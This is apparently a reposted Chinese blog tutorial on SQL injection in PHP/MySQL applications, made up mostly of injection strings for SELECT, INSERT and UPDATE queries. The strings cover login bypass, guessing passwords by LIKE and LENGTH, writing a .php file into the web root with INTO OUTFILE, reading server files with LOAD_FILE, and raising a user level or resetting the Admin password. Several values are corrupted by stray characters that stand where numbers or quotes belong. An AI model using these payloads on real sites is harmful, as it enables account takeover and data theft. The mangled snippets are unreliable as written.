PHP注入

PHP注入.精简版本.小夜整理.有些地方我加了注释.
文章比较细致.主要介绍了三种SQL句子的注入方法.

1- SELECT
2- INSERT
3- UPDATE

$req = "SELECT * FROM membres WHERE name LIKE '% $search%' ORDER BY name"

où $search est la variable modifiable par l'utilisateur, venant d'un formulaire post (ou autre chose) de ce type :

1<form action="&lt;? echo $PHP_SELF; ?&gt;" method="POST">
2<input name="search" type="text"/><br/>
3<input type="submit" value="Search"/>
4</form>

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

$req = "SELECT uid FROM admins WHERE login=' $login' AND password=' $pass'"

SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END -------小猪早就开始利用了.呵呵.

SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a'

SELECT uid FROM admins WHERE login='John' AND password='' OR 'b' BETWEEN 'a' AND 'c'

SELECT * FROM table WHERE nom='Jack'# commentaire

SELECT * FROM table WHERE nom='Jack'

SELECT * FROM table WHERE /* commentaires */ addresse=ཕ rue des roubys'

SELECT * FROM table WHERE addresse=ཕ rue des roubys'

SELECT uid FROM admins WHERE login='John'#' AND password=''

SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''

$req = "SELECT password FROM admins WHERE login=' $login'"

SELECT * FROM table INTO OUTFILE '/complete/path/to/file.txt' ----将表导出.

SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'

http://[target]/file.txt.
frog' INTO OUTFILE '/path/to/site/file.php .

$req = "SELECT uid FROM membres WHERE login=' $login' AND password=' $pass'"

SELECT * FROM table WHERE msg LIKE '%hop'

SELECT * FROM table WHERE msg LIKE 'hop%'

SELECT * FROM table WHERE msg LIKE '%hop%'

SELECT * FROM table WHERE msg LIKE 'h%p'

SELECT * FROM table WHERE msg LIKE 'h_p'

SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''

SELECT uid FROM membres WHERE login='Bob' AND LENGTH(password)=6#' AND password=''

$req = "SELECT email, website FROM membres WHERE name LIKE '% $search%' ORDER BY name"

SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

$req = "SELECT email, website FROM membres WHERE name LIKE '% $search%' ORDER BY $orderby"

以上是SELECT的注入.上面提到的.我们早已经掌握了.继续看

INSERT :

CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)

$query1 = "INSERT INTO membres (login,password,nom,email,userlevel) VALUES (' $login',' $pass',' $nom',' $email',Ƈ')"

INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','',Ɖ')#',Ƈ')

CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint default Ƈ',
PRIMARY KEY (id)
)

$query2 = "INSERT INTO membres SET login=' $login',password=' $pass',nom=' $nom',email=' $email'"

INSERT INTO membres SET login='',password='',nom='',userlevel=Ɖ',email=''

CREATE TABLE membres (
id varchar(15) NOT NULL default '',
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)

$query3 = "INSERT INTO membres VALUES (' $id',' $login',' $pass',' $nom',' $email',Ƈ')"

INSERT INTO membres VALUES ('[ID]','[LOGIN]','[PASS]','[NOM]','[email protected]',Ɖ')#',Ƈ')

可见.INSERT注入关键是截断,)再加注释的利用.没问题.很简单吧.继续

UPDATE的利用

CREATE TABLE membres (
id int(10) NOT NULL auto_increment,
login varchar(25),
password varchar(25),
nom varchar(30),
email varchar(30),
userlevel tinyint,
PRIMARY KEY (id)
)

$sql = "UPDATE membres SET password=' $pass',nom=' $nom',email=' $email' WHERE id=' $id'"

UPDATE membres SET password='[PASS]',nom='',userlevel=Ɖ',email=' ' WHERE id='[ID]'

UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'#',nom='[NOM]',email=' ' WHERE id='[ID]'

UPDATE membres SET password='[nouveaupass]' WHERE nom='Admin'

UPDATE membres SET password='[PASS]',nom='[NOM]',email=' ' WHERE id='' OR name='Admin'

CREATE TABLE news (
idnews int(10) NOT NULL auto_increment,
title varchar(50),
author varchar(20),
news text,
Votes int(5),
score int(15),
PRIMARY KEY (idnews)
)

$sql = "UPDATE news SET Votes=Votes+1, score=score+ $note WHERE idnews=' $id'"

UPDATE news SET Votes=Votes+1, score=score+3, title='hop' WHERE idnews=཈'

UPDATE news SET Votes=Votes+1, score=score+3,Votes=0 WHERE idnews=཈'

UPDATE news SET Votes=Votes+1, score=score+3, title=char(104,111,112) WHERE idnews=཈'

la fonction ASCII() ou ORD(). ASCII('h') et ORD('h')

UPDATE news SET Votes=Votes+1, score=score+3, title=0x616263 WHERE idnews=཈'
SELECT CONV("abc",16,3), CONV("abc",16,8).

DATABASE() et USER() ( ou SYSTEM_USER() ou CURRENT_USER() ou SESSION_USER() )

UPDATE news SET Votes=Votes+1, score=score+3, title=DATABASE() WHERE idnews=཈'

UPDATE news SET Votes=Votes+1, score=score+3, news=LOAD_FILE('/tmp/picture') WHERE idnews=཈' **
**

Published At
Categories with Web编程
Tagged with
comments powered by Disqus